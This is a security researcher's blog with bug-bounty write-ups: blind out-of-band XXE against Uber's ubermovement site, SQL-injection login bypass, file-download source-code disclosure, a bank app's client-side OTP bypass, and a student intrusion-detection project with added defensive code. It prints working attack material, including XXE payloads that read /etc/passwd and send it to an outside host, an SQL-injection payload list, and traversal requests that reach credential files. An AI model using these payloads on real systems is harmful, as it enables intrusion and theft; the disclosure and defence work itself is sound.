Friday, 5 August 2016

Blind OOB XXE At UBER 26+ Domains Hacked.

XXE (XML External Entity) :
An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.

This is the story of how I was able to find XXE in one of Uber's websites that was in the bug bounty program scope.

On the evening of July 26th 2016 I was working on the ubermovement web application.
As it was a small webapp there were not many parameters to run injection tests on. I started the old school tests and the first parameter I came across was the search box.


Now, I attached Burp Suite, then gave a keyword to search and started monitoring the requests...

In the "search" directory I got two requests.
1. The keyword I searched : http://ubermovement.com/api/search/GeneralSearch?crumb=ASmuamNBJiP4eyC3qpXZWu87i5X6PWGh&q=cat&p=0
2. http://ubermovement.com/api/search/GeneralSearch


Now, for the first request I started attacks like XSS, SQL, XPath, XXE, command injection and many more...

But they all failed and I didn't find any vulnerability.

Now I started my tests with second request...

As there were no parameters, I sent the request to Repeater and started looking for directory-based vulnerabilities.

 
Then, as all my other injection tests had failed, lastly I started looking for XXE.

So, the first thing I did was change the request method to POST and check the response.



As the response was the same as for the GET request, I added the Content-type header as application/xml
and a basic XML body with "GeneralSearch" as the search parameter, then checked the response.
<?xml version="1.0" encoding="utf-8"?>
<GeneralSearch>cat</GeneralSearch>


The response was shocking as I got an XML error.

Now I was about 60% sure that it could lead to XXE. So, I started the blind test for XXE with different payloads, e.g.:

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE dtgmlf6 [ <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<GeneralSearch>&xxe;</GeneralSearch>

But still no luck; all I was getting was the XML error in the response...

Now, I thought, let's check the vulnerability via the OOB (out-of-band) method and perform a ping test.

So,
step-1 : I downloaded XAMPP and hosted an Apache server.
step-2 : I port forwarded port 80 to my machine so I could access my server via my public IP from other networks.
step-3 : I edited the XXE payload to :

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE dtgmlf6 [ <!ENTITY dtgmlf6ent SYSTEM "http://0.0.0.0/">
]>
<GeneralSearch>&dtgmlf6ent;</GeneralSearch> 

step-4 : Started the attack and got the error.


step-5 : I checked my server logs and I got a perfect ping from the vulnerable application.




Now the manual test confirmed the vulnerability, so I scanned the particular vulnerable request with Acunetix and it detected the vulnerability as well.


 
Then I reported the bug first and then started doing further tests with .dtd payloads.

It turned out that various sub-domains of *.ubermovement.com had the same flaw.

Google Dork : site:ubermovement.com "/search/"



Original HackerOne Report #154096

Test Summary :

POST data was set to <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE dtgmlf6 [ <!ENTITY dtgmlf6ent SYSTEM "http://0.0.0.0/"> ]> <GeneralSearch>&dtgmlf6ent;</GeneralSearch>
An HTTP request was initiated for the domain http://0.0.0.0/ which indicates that this script is vulnerable to XXE injection.
NOTE : As it was a blind XXE test, I was successful in the ping test for XXE but unable to retrieve any sensitive information.

HTTP request details:

IP address: 8.36.86.67
User agent: Java/1.8.0_60

Vulnerable Domain :

Vulnerable Link :

Vulnerable Parameter :

GeneralSearch

Steps To Reproduce :

  1. Go to the website : http://ubermovement.com/
  2. Attach Burp Suite & start intercepting; now click on search and search...
  3. Grab the GET request

    Eg. Original HTTP Request :

    GET /api/search/GeneralSearch HTTP/1.1
    Host: ubermovement.com
    Accept: /
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
  4. Now, send the request to Repeater & change it to POST.

    Eg. HTTP request changed to POST :

POST /api/search/GeneralSearch HTTP/1.1
Host: ubermovement.com
Content-Length: 173
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: /
  5. Now add the content type, e.g. Content-type: application/xml

Request will be:

POST /api/search/GeneralSearch HTTP/1.1
Content-type: application/xml
Host: ubermovement.com
Content-Length: 173
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: /
  6. Deploy a web server and host a "payload.dtd" file, e.g.:

    payload.dtd :

    <?xml version="1.0" encoding="UTF-8"?>
    <!ENTITY % all "<!ENTITY send SYSTEM 'http://xxe.me/content?%file;'>">
    %all;
  7. Now add the XXE payload for confirmation :
    <?xml version="1.0" encoding="utf-8"?>
    <!DOCTYPE roottag [ 
    <!ENTITY % file SYSTEM "file:///etc/passwd">
    <!ENTITY % dtd SYSTEM "http://0.0.0.0/payload.dtd">
    %dtd;]>
    <GeneralSearch>&send;</GeneralSearch>

Request Will Be :

POST /api/search/GeneralSearch HTTP/1.1
Content-type: application/xml
Host: ubermovement.com
Content-Length: 214
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: /
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag [ 
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://0.0.0.0/payload.dtd">
%dtd;]>
<GeneralSearch>&send;</GeneralSearch>
NOTE : If you view your web server logs you will find a 404 error.
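The checks a defender would put in front of an endpoint like GeneralSearch, as an added example (my own Python, not the post's or the site's code): a pre-parse inspection that flags the DOCTYPE and external entity declarations used in the payloads above, and an expat parser configured to refuse any DTD, so the out-of-band fetch never leaves the server. The sample bodies are constructed from the post's payloads; the function names are mine.

```python
import re
from xml.parsers import expat

# Constructed request bodies, shaped like the payloads in the post.
BENIGN_BODY = '<?xml version="1.0" encoding="utf-8"?><GeneralSearch>cat</GeneralSearch>'
INLINE_FILE_PAYLOAD = (
    '<?xml version="1.0" encoding="utf-8"?>'
    '<!DOCTYPE dtgmlf6 [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>'
    '<GeneralSearch>&xxe;</GeneralSearch>'
)
OOB_PING_PAYLOAD = (
    '<?xml version="1.0" encoding="utf-8"?>'
    '<!DOCTYPE dtgmlf6 [ <!ENTITY dtgmlf6ent SYSTEM "http://0.0.0.0/"> ]>'
    '<GeneralSearch>&dtgmlf6ent;</GeneralSearch>'
)
EXTERNAL_DTD_PAYLOAD = (
    '<?xml version="1.0" encoding="utf-8"?>'
    '<!DOCTYPE roottag [ <!ENTITY % file SYSTEM "file:///etc/passwd">'
    ' <!ENTITY % dtd SYSTEM "http://0.0.0.0/payload.dtd"> %dtd;]>'
    '<GeneralSearch>&send;</GeneralSearch>'
)

_DOCTYPE = re.compile(r"<!DOCTYPE\b", re.I)
# <!ENTITY [%] name SYSTEM "uri">  or  <!ENTITY [%] name PUBLIC "id" "uri">
_EXT_ENTITY = re.compile(
    r"<!ENTITY\s+(%\s*)?([^\s>]+)\s+(?:SYSTEM|PUBLIC\s+(?:\"[^\"]*\"|'[^']*'))"
    r"\s+(?:\"([^\"]*)\"|'([^']*)')",
    re.I,
)


def inspect_xml_body(body):
    """Classify an inbound XML body before it reaches the real parser.

    Returns {"doctype": bool, "external_entities": [...], "verdict": str}.
    Each entity entry records its name, whether it is a parameter entity
    (the %dtd; trick) and the URI scheme it would make the parser fetch.
    """
    entities = []
    for m in _EXT_ENTITY.finditer(body):
        uri = m.group(3) if m.group(3) is not None else m.group(4)
        scheme = uri.split(":", 1)[0].lower() if ":" in uri else ""
        entities.append({"name": m.group(2), "parameter": m.group(1) is not None,
                         "scheme": scheme})
    has_doctype = bool(_DOCTYPE.search(body))
    # The search API never needs a DTD, so any DOCTYPE is enough to block;
    # the entity list is what you would log for the SOC.
    return {"doctype": has_doctype, "external_entities": entities,
            "verdict": "block" if has_doctype else "allow"}


class DoctypeRejected(ValueError):
    pass


def parse_search_body(body):
    """Extract the <GeneralSearch> text with a parser that refuses any DTD.

    Raises DoctypeRejected for every payload shown in the post; external
    entity references are never resolved even if a DOCTYPE slipped through.
    """
    chunks = []

    def start_doctype(name, sysid, pubid, has_internal_subset):
        raise DoctypeRejected("DOCTYPE %r not allowed in this request" % name)

    def external_entity_ref(context, base, sysid, pubid):
        return 0  # expat treats 0 as "could not open", which aborts the parse

    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    parser.StartDoctypeDeclHandler = start_doctype
    parser.ExternalEntityRefHandler = external_entity_ref
    parser.CharacterDataHandler = chunks.append
    parser.Parse(body, True)
    return "".join(chunks)


def rejects(body):
    """True when the hardened parser refuses the body."""
    try:
        parse_search_body(body)
    except (DoctypeRejected, expat.ExpatError):
        return True
    return False
```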

Wednesday, 11 May 2016

That Moment When You Find Authentication Bypass Vulnerability In Bug Bounty Program ?

One whole year has passed since I joined bug bounty programs on various platforms, and all I could find was a handful of XSS, XFS, CSRF and CRLF vulnerabilities with 2 to 3 logical bugs and about a million duplicates...

On the evening of 22nd Dec 2015 I started looking for sub-domains of a website that was newly introduced to a bug bounty program. After fingerprinting all the domains I found a unique domain which was hosted on an IIS server & running ASP.NET technology at the back end. An Nmap scan gave me the version of the server & technology. The web application was running on Windows Server 2003, Microsoft IIS 6.0 with Microsoft SQL Server 2005. That was too old for 2015 technologies, so I went old school on one of the parameters of the page to search for SQL injection.


I injected a quote and in a few seconds I received a SQL error. Now I was sure a SQL vulnerability was present in this sub-domain. As it was a sub-domain the severity of the bug was lower, so my main job was to find as many unique SQL bugs in the web application as I could.

The second thought that came to my mind was to check for all SQL injections, so I gave the web app an automated SQL scan.


After a full scan of the web application all I found was 3 unique parameters with a SQL bug. But luckily 2 of the parameters were "Email" & "Password". After seeing them I got an idea for bypassing the authentication via SQLi. So, now I was able to report two different types of bug.
1. Authentication Bypass via SQLi
2. Error Based SQL Injection.

Now comes the POC part for both. Exploiting error based SQL injection was easy if you know how to perform the attack, or alternatively you can use modern day automated injection tools for creating the POC. So I used SQLMap for creating the POC for the error based SQL injection.
   


Now, Creating POC for Authentication Bypass via SQLi...
1. I opened Admin Login Page.


2. Intercepting the Authentication Request Via Burp Suite.


3. I started brute forcing with different SQLi payloads; the list goes like :
' or ' 1 ' = ' 1
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--

& in the end the payload : 'or' '='
wooooooooooo..... at last it worked for me.

So, finally both my POCs were created and I successfully received a good amount of bug bounty for both my reports.

- Raghav
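The root cause of both bugs, shown as an added example (my own Python with an in-memory SQLite table, not the site's ASP.NET/MSSQL code): the login query built by string concatenation reacts to the post's payloads with either a bypass or a SQL error, while the parameterised version treats the same strings as plain data. The table, credentials and function names are constructed.

```python
import sqlite3

TEST_EMAIL = "admin@example.test"        # constructed account
TEST_PASSWORD = "correct-horse-battery"  # constructed password


def make_db():
    """In-memory stand-in for the post's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
    conn.execute("INSERT INTO users (email, password) VALUES (?, ?)",
                 (TEST_EMAIL, TEST_PASSWORD))
    conn.commit()
    return conn


def login_vulnerable(conn, email, password):
    """The pattern behind the bug: user input pasted straight into the SQL text."""
    sql = ("SELECT id FROM users WHERE email='" + email +
           "' AND password='" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_parameterised(conn, email, password):
    """Placeholders keep the input as data, so quotes and comments stay literal."""
    sql = "SELECT id FROM users WHERE email=? AND password=?"
    return conn.execute(sql, (email, password)).fetchone() is not None


def probe(login, conn, email, password):
    """Outcome of one login attempt: 'bypass', 'denied' or 'sql-error'.

    A 'sql-error' is the signal the post describes after injecting a quote;
    a 'bypass' is the authentication bypass it reports.
    """
    try:
        return "bypass" if login(conn, email, password) else "denied"
    except sqlite3.OperationalError:
        return "sql-error"


# Payloads taken from the post's list. '#' is not a comment marker in SQLite,
# so that one produces a syntax error here rather than a bypass.
PAYLOADS = ["'", "' or 1=1--", "admin' --", "admin' #"]


def compare(payloads=PAYLOADS):
    """{payload: (vulnerable outcome, parameterised outcome)} for each payload."""
    conn = make_db()
    return {p: (probe(login_vulnerable, conn, TEST_EMAIL, p),
                probe(login_parameterised, conn, TEST_EMAIL, p))
            for p in payloads}
```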

Tuesday, 3 May 2016

Old School Source Code Disclosure Vulnerability

On May 2nd I started a re-evaluation of a web application for a client. While doing the re-evaluation I found out that they had added some more functions to the web app. I started exploring the new features of the app; everything looked fine as they were all static HTML pages, then suddenly I came across a file "filedownload.php".

Now, my first step was to spider this branch, which I did with the help of Burp Suite, & the full link was "http://site.com/filedownload.php?file=E:\netpub\vhosts\www\httpdocs/journal/welcome.pdf"

The path of the application was disclosed : E:\netpub\vhosts\www\

Then, I simply ran the link "http://site.com/filedownload.php?file=" in my browser & received an error message from the server :
"ERROR: download file NOT SPECIFIED. USE forcedownload.php?file=filepath"

The moment I saw that error I remembered it may be an old school GHDB type file download vulnerability, so now I had to check for two types of vulnerability :
1. LFI - Local File Inclusion
2. Source Code Disclosure

So after doing some directory traversal attacks I was sure that LFI was not applicable.

Then I started looking for the web.config file as the server was running on Windows IIS.
"http://site.com/filedownload.php?file=web.config" - the link worked but no luck as the file was empty.


Then I looked for the "index.php" file, as many web developers set their database connection password in the "index" file: "http://site.com/filedownload.php?file=index.php". Luckily I was able to download the index file but still the password was not present.


But, I get a hint a file name "UserUtils.php" was linked to the "index.php" file.
So, I started searching for "UserUtils.php" in all available paths I knew. After some hard work I located file inside "E:\netpub\vhosts\www\htdocs\UserUtils.php" Full Link :
"http://site.com/filedownload.php?file=E:\netpub\vhosts\www\htdocs\UserUtils.php"
 & file contains SMTP Server's Administrator Email ID , UserName , Password etc...

 
But still I was not done, I had to find the database credentials, so after reading the whole file I found a new path which had the configuration files "admin/include/config.php" & "admin/include/functions.php"

Now, I tried to download the configuration file "http://site.com/filedownload.php?file=admin/include/config.php"


& cheers, I was able to see the database credentials as they were in plaintext.
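What a safe version of that filedownload.php?file= handler has to check, as an added example in Python (my own code, not the client's): the value is normalised with either separator, absolute and drive-letter paths and any ".." segment are refused, and only the allowed extension is served from a fixed download directory, so the web.config, index.php and config.php requests from the walk-through are all rejected. DOWNLOAD_ROOT and the extension list are constructed.

```python
import posixpath
import re

DOWNLOAD_ROOT = "/var/www/downloads/journal"   # constructed: the only directory served
ALLOWED_EXTENSIONS = {".pdf"}                  # constructed: what the journal link hands out

_DRIVE = re.compile(r"^[A-Za-z]:")             # E:\... style paths


def resolve_download(file_param):
    """Return the on-disk path to serve, or None when the request must be refused.

    The post's handler used the parameter as a raw path, which is why
    web.config, index.php and admin/include/config.php could be read.
    """
    if not file_param or "\0" in file_param:
        return None
    cleaned = file_param.replace("\\", "/")          # accept either separator, as the site did
    if cleaned.startswith("/") or _DRIVE.match(cleaned):
        return None                                   # absolute, UNC or drive path: never
    norm = posixpath.normpath(cleaned)
    if norm in (".", "..") or norm.startswith("../"):
        return None                                   # climbs out of the download directory
    if posixpath.splitext(norm)[1].lower() not in ALLOWED_EXTENSIONS:
        return None                                   # source and config files are never served
    return posixpath.join(DOWNLOAD_ROOT, norm)
```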

Similar Type Of Attack Video Tutorial : https://www.youtube.com/watch?v=gjREfF5C4RQ

Thanks,


-Raghav Bisht

Wednesday, 20 April 2016

Easiest Authentication Bypass Ever !!!

September 4th 2015,

I was given a re-evaluation pen-test for a bank's Android/iOS application.
It took me hardly an hour to replicate the tests for the previous vulnerabilities. When I was done with my work I still had time before sending my report to the client. So I started looking through my Burp Suite history and suddenly I noticed an HTTP response which was carrying a verification code parameter...



I was shocked as the code was the same as the OTP that I had requested earlier that hour for logging in to my account. A million questions came to my mind, such as how?, why? ...etc. One thing was clear: the application's authentication via OTP was going on at the client side.





I had a thought: if the OTP & verification codes are present in the HTTP response I can easily bypass the authentication, plus I can change the password for any account I like; all I need is the victim's user name, email or mobile number.

So, here goes the POC for how a client-side OTP check is dangerous for users:

1. I started the login with the victim's mobile no. & the user mobile number was checked correctly.







2. Then I was navigated to the Enter Password / Forgot Password activity, so I attached Burp Suite for HTTP request interception.
  


3. I clicked on forgot password & a request was generated; I forwarded the request & intercepted the response for that request. The response I received contained the verification code.



4. So, I got the verification code, & I was redirected to the Verification activity.


5. I put the OTP in the form & pressed OK. Then I successfully entered the Change Password activity.




Thanks.....



-Raghav Bisht
 
 

Tuesday, 5 January 2016

CTRL+C, +V (Copy Paste) Best Idea To Build Capstone Projects

Hii again...
Hope you liked my previous post "Post XSS At : research.microsoft.com".

Finally it was 8th semester; the 4 years of fun were going to end in the next 5 months and the gang decided to attend the first day's class on time as a ritual. Professors were well aware that there would be full strength on the first day, the last day & the day before exams, so they were ready with their A-bomb for students.
This time the A-bomb was the "Capstone Project": the 10 credit, game changing, 5 month task that either puts your grades inside a tombstone or raises them above the stars. So we heard about the task, and within a week we had to make a group of 4-5 persons and choose a project & mentors.

The group was made in less than a minute but choosing the project was a tough call, so we decided to come up with as many ideas as possible in the next 3 days. On the 3rd day the team members gathered in class and contributed our ideas, e.g. shopping website, social networking website, Skype-like software, Google Drive-like systems etc...

NOTE : Personal advice to students out there looking for projects :
1. Always choose a project that no one else is making. [ Different Project ]
2. The project should sound complex and tough to understand but be the easiest to program.

So, we thought about the above guidelines and dropped the idea of making websites or software because they were so common and similar among other students, & came to the conclusion that we were going to make a project related to cyber security, as security would be the least considered among other students and professors.

But in cyber security we came across many projects like RAT, Anti-Virus, DMZ etc...
The projects were awesome but the problem was the practical implementation. E.g. if we made a RAT (Remote Administration Tool) the main task was to get a remote connection to our victim PC. That was easy if the victim had disabled their firewall & anti-virus, but while giving the viva to professors there would be no point saying "we have to disable the firewall of the victim." It would be a huge fail for the team. So, we went with the easiest one in the book, called "IDS" (Intrusion Detection System); it was a perfect project, it sounds difficult but once you understand the concept it is easy to code.

As a developer the biggest question after choosing the project was 3W1H....?????
How to start ?
When to start ?
Where should we start from ?
Who will start ?
The solution in the books was simple: SDLC (Systems Development Life Cycle), but it only works when you know what you are going to start. We only had an idea that IDS means "Intrusion Detection System" & its work is to detect intruders, e.g. if an attacker is trying to get access to our system we should get an alert of his presence.
So ignoring the SDLC concept we started working blind, on a problem-followed-by-solution concept. Now the ultimate problem was how to code? Which programming language should we choose?
The answer was: make it as simple as you can for users & other programmers to understand, so we chose Perl & Linux bash scripting.

The week passed, we registered our project & chose our mentor. The deadline for our first month report was near and we hadn't started our project. We had to show the interface and the features of our project. By then we knew what we had to do; we categorized our system in four:
1. Firewall
2. Honeypot
3. DOS Detection  
4. Logs Management

& came up with the interface. Our main objective was to create simple scripts for each category.
Eg. For firewall : IP, port blocking etc...


Month 1: we wrote simple scripts for the firewall like :
1. Blacklisting IP Address
2. Blacklisting MAC Address
3. Blacklisting Ports
4. Block Website
5. Block Ads
6. Backdoor scanner
7. Trojans scanner

We used simple tricks for building these scripts, like...
for blacklisting IPs, MACs and ports we used iptables commands :

1. IP Blocking :
 iptables -A INPUT -s $ip -j DROP 

2. MAC Blocking : 
iptables -A INPUT -m mac --mac-source $mac -j DROP
iptables -A FORWARD -m mac --mac-source $mac -j DROP


3. Ports Blocking :
 iptables -A INPUT -p tcp --destination-port $Po -j DROP

4. Ads Block :
Parsing the IPs from http://www.spamhaus.org/drop/drop.lasso & blocking them with iptables.

5. Backdoor Scanner
Comparing known backdoor signatures with the source of the file we want to scan.

6. Blocking Website
using the simple hosts file IP blocking concept




Month 2: Creating a honeypot.
The simplest way to understand a honeypot is: pretend to be vulnerable to the attacker's attacks & trap the attacker at the time of the attack.


How to build a trap ?

Think like an attacker. Attackers always do footprinting and scanning before launching their attack; it's simple, if you do not know about the target you can't move further.

So, we built a simple trap called PSAD (Port Scan Attack Detection).
In this, if an attacker tries to use different types of Nmap scan on our system we will get an alert with the IP address doing that scan.

The trick was to use a network sniffer, e.g. Wireshark or tshark, and create a rule to look for specific TCP flags in the packets that are coming from the attacker's side.

tshark -i $fa -f "ip proto 6 or ip proto 17" -R "tcp.flags == 16 or tcp.flags == 1 or tcp.flags == 2 or tcp.flags == 18 or tcp.flags == 41 or tcp.flags == 16 or tcp.flags == 0 or ip.len == 28 or icmp.type == 8"   

You must be wondering what the above tshark command is for. OK, the trick was to view all the Nmap scans in detail and check which TCP flags are used for scanning.

Eg. TCP Flags With Decimal Numbers Assigned :
FIN = 1
SYN = 2
RST = 4
PSH = 8
ACK = 16
URG = 32
ECE = 64
CWR = 128


Different types of scan using TCP flags that you can filter out using tshark.

TCP Connect Scan
Filter : ip.proto == 6 and tcp.flags == 18

TCP SYN Scan
Filter : ip.proto == 6 and tcp.flags == 2

TCP FIN Scan
Filter : ip.proto == 6 and tcp.flags == 1

TCP XMAS Scan
Filter : ip.proto == 6 and tcp.flags == 41

TCP NULL Scan
Filter : ip.proto == 6 and tcp.flags == 0

TCP ACK Scan
Filter : ip.proto == 6 and tcp.flags == 16

UDP Scan
Filter : ip.proto == 17 and ip.len == 28
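The flag table and filter list above turned into detection logic, as an added example (my own Python, not the project's Perl/bash): it decodes tcp.flags values into flag names, maps each packet to the scan type the filters describe, and goes one step beyond the post by alerting only when one source has probed several distinct ports, since a single SYN is just a normal connection. The packet records are constructed.

```python
# TCP flag bits, as listed in the post.
FIN, SYN, RST, PSH, ACK, URG, ECE, CWR = 1, 2, 4, 8, 16, 32, 64, 128
FLAG_NAMES = [(FIN, "FIN"), (SYN, "SYN"), (RST, "RST"), (PSH, "PSH"),
              (ACK, "ACK"), (URG, "URG"), (ECE, "ECE"), (CWR, "CWR")]

# The flag combinations the post's tshark rule matches, and the scan each suggests.
SCAN_SIGNATURES = {
    SYN | ACK: "TCP connect scan",     # 18
    SYN: "TCP SYN scan",               # 2
    FIN: "TCP FIN scan",               # 1
    FIN | PSH | URG: "TCP XMAS scan",  # 41
    0: "TCP NULL scan",
    ACK: "TCP ACK scan",               # 16
}
UDP_EMPTY_DATAGRAM_LEN = 28  # 20-byte IP header + 8-byte UDP header, no payload


def flag_names(flags):
    """Decode a tcp.flags value into flag names, e.g. 41 -> ['FIN', 'PSH', 'URG']."""
    return [name for bit, name in FLAG_NAMES if flags & bit]


def classify_packet(proto, flags=0, ip_len=0, icmp_type=None):
    """Name the probe type one packet matches under the post's filters, else None."""
    if proto == 6:
        return SCAN_SIGNATURES.get(flags)
    if proto == 17 and ip_len == UDP_EMPTY_DATAGRAM_LEN:
        return "UDP scan"
    if proto == 1 and icmp_type == 8:
        return "ICMP echo sweep"
    return None


def scan_alerts(packets, min_ports=3):
    """Alert per source once it has probed min_ports distinct ports with one scan type.

    A lone SYN is a normal connection attempt; the per-source distinct-port
    count is what separates a scan from ordinary traffic.
    packets: dicts with keys src, proto and optionally flags, ip_len, dport, icmp_type.
    Returns a sorted list of (src, scan_type, distinct_ports).
    """
    seen = {}
    for pkt in packets:
        kind = classify_packet(pkt["proto"], pkt.get("flags", 0),
                               pkt.get("ip_len", 0), pkt.get("icmp_type"))
        if kind is None:
            continue
        seen.setdefault(pkt["src"], {}).setdefault(kind, set()).add(pkt.get("dport"))
    return sorted((src, kind, len(ports))
                  for src, kinds in seen.items()
                  for kind, ports in kinds.items() if len(ports) >= min_ports)


# Constructed capture: one XMAS scanner, one empty-datagram UDP prober, and
# one host making an ordinary connection to port 443.
SAMPLE_PACKETS = [
    {"src": "10.0.0.5", "proto": 6, "flags": 41, "dport": 22},
    {"src": "10.0.0.5", "proto": 6, "flags": 41, "dport": 80},
    {"src": "10.0.0.5", "proto": 6, "flags": 41, "dport": 443},
    {"src": "10.0.0.5", "proto": 6, "flags": 41, "dport": 8080},
    {"src": "10.0.0.7", "proto": 17, "ip_len": 28, "dport": 53},
    {"src": "10.0.0.7", "proto": 17, "ip_len": 28, "dport": 123},
    {"src": "10.0.0.7", "proto": 17, "ip_len": 28, "dport": 161},
    {"src": "10.0.0.9", "proto": 6, "flags": 2, "dport": 443},   # SYN: normal handshake
    {"src": "10.0.0.9", "proto": 6, "flags": 24, "dport": 443},  # PSH/ACK: data, no match
]
```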



Month 3: Writing scripts for DoS / DDoS detection & log management.


1. ARP Poisoning Check
The trick was to compare the original gateway MAC to the MAC seen after an attack starts.
Command used  : arp -a $ip 

Create a program that first stores the original MAC (MAC1), then compares it with the current MAC (MAC2):
if MAC1 == MAC2 there is no poisoning, else poisoning is in process. In bash:

# record the gateway's MAC once at startup, then re-read it on every check
mac1=$(arp -a "$ip" | awk '{print $4}')
while true; do
  mac2=$(arp -a "$ip" | awk '{print $4}')
  if [ "$mac1" = "$mac2" ]; then echo "no poisoning"; else echo "ARP poisoning in process: $mac1 -> $mac2"; fi
  sleep 5
done

2. HTTP DDoS Check
while true; do
  # with -n netstat prints numeric ports, so match ":80 " rather than the service name HTTP
  check=$(netstat -nap | grep ':80 ' | wc -l)
  if [ "$check" -gt 20 ]; then echo "possible HTTP DDoS: $check connections"; fi
  sleep 5
done

If netstat is showing connections from many different IP addresses requesting the server at the same time, a DDoS is in process.

3. UDP DoS Check
while true; do
  check=$(netstat -anp | grep 'udp' | wc -l)
  if [ "$check" -gt 20 ]; then echo "possible UDP DoS: $check sockets"; fi
  sleep 5
done

If netstat is showing connections from many different IP addresses requesting the server at the same time, a DDoS is in process.

4. TCP / IP DoS
To count the distinct remote IPs across both tcp & udp use :
netstat -anp | grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n | wc -l

5. SYN DoS Check
while true; do
  # half-open connections show up as SYN_RECV in the State column
  check=$(netstat -nap | grep SYN | wc -l)
  if [ "$check" -gt 20 ]; then echo "possible SYN flood: $check half-open connections"; fi
  sleep 5
done

If netstat is showing connections from many different IP addresses requesting the server at the same time, a DDoS is in process.

6. Ping of Death Check

Sniff the network & check the size of the ICMP echo request packets:

tshark -i wlan0 -R "icmp.type == 8" -c 200
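The netstat checks above as one parser, added here as my own Python (not the project's scripts): it reads netstat -anp rows, reproduces the awk/cut/sort/uniq count of distinct remote IPs, and raises the HTTP, SYN and UDP alerts from per-source counts rather than raw line counts, so one busy client does not look like a flood. The netstat output is constructed.

```python
# Constructed `netstat -anp` output (Linux net-tools layout).
SAMPLE_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 10.0.0.10:80            203.0.113.5:51234       SYN_RECV    -
tcp        0      0 10.0.0.10:80            203.0.113.6:40001       SYN_RECV    -
tcp        0      0 10.0.0.10:80            203.0.113.7:40002       SYN_RECV    -
tcp        0      0 10.0.0.10:80            203.0.113.8:40003       SYN_RECV    -
tcp        0      0 10.0.0.10:80            198.51.100.2:52000      ESTABLISHED 1234/httpd
tcp        0      0 10.0.0.10:22            198.51.100.9:50011      ESTABLISHED 987/sshd
tcp6       0      0 :::80                   :::*                    LISTEN      1234/httpd
udp        0      0 10.0.0.10:53            192.0.2.1:4444          -
udp        0      0 10.0.0.10:53            192.0.2.2:4445          -
"""


def parse_netstat(text):
    """Return (proto, local, remote_ip, state) per socket row; listeners are skipped."""
    rows = []
    for line in text.splitlines():
        f = line.split()
        if not f or not f[0].startswith(("tcp", "udp")):
            continue
        proto, local, foreign = f[0], f[3], f[4]
        # UDP rows have no State column, so the 6th field is the PID there.
        state = f[5] if proto.startswith("tcp") and len(f) > 5 else ""
        remote_ip = foreign.rsplit(":", 1)[0]           # like cut -d: -f1, but IPv6-safe
        if state == "LISTEN" or remote_ip in ("", "*", "0.0.0.0", "::"):
            continue
        rows.append((proto, local, remote_ip, state))
    return rows


def dos_indicators(text, port=80, threshold=20):
    """Counts behind the post's HTTP, SYN, UDP and TCP/IP checks, plus alerts.

    threshold is the post's `-gt 20`; the HTTP and SYN alerts also require
    that many distinct sources, which is what the post's prose asks for.
    """
    rows = parse_netstat(text)
    http = [r for r in rows if r[0].startswith("tcp") and r[1].endswith(":%d" % port)]
    syn = [r for r in rows if r[3] == "SYN_RECV"]
    udp = [r for r in rows if r[0].startswith("udp")]
    counts = {
        "http_connections": len(http),
        "http_sources": len({r[2] for r in http}),
        "syn_recv": len(syn),
        "syn_sources": len({r[2] for r in syn}),
        "udp_flows": len(udp),
        "udp_sources": len({r[2] for r in udp}),
        "distinct_peers": len({r[2] for r in rows}),   # the awk | cut | sort | uniq -c pipeline
    }
    alerts = []
    if counts["http_connections"] > threshold and counts["http_sources"] > threshold:
        alerts.append("HTTP DDoS suspected: %d connections to port %d from %d sources"
                      % (counts["http_connections"], port, counts["http_sources"]))
    if counts["syn_recv"] > threshold and counts["syn_sources"] > threshold:
        alerts.append("SYN flood suspected: %d half-open connections from %d sources"
                      % (counts["syn_recv"], counts["syn_sources"]))
    if counts["udp_flows"] > threshold:
        alerts.append("UDP flood suspected: %d UDP flows" % counts["udp_flows"])
    counts["alerts"] = alerts
    return counts
```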


Log Management :

In log management, syslog and commands like stat, faillog, last etc. were used.

The following Linux log files were monitored and checked for updates & modification :

"/var/log/lastlog", "/var/log/telnetd", "/var/run/utmp",
"/var/log/secure", "/root/.ksh_history", "/root/.bash_history",
"/root/.bash_logout", "/var/log/wtmp", "/etc/wtmp",
"/var/run/utmp", "/etc/utmp", "/var/log", "/var/adm",
"/var/apache/log", "/var/apache/logs", "/usr/local/apache/logs",
"/usr/local/apache/logs", "/var/log/acct", "/var/log/xferlog",
"/var/log/messages/", "/var/log/proftpd/xferlog.legacy",
"/var/log/proftpd.xferlog", "/var/log/proftpd.access_log",
"/var/log/httpd/error_log", "/var/log/httpsd/ssl_log",
"/var/log/httpsd/ssl.access_log", "/etc/mail/access",
"/var/log/qmail", "/var/log/smtpd", "/var/log/samba", "/var/lock/samba", "/root/.Xauthority",
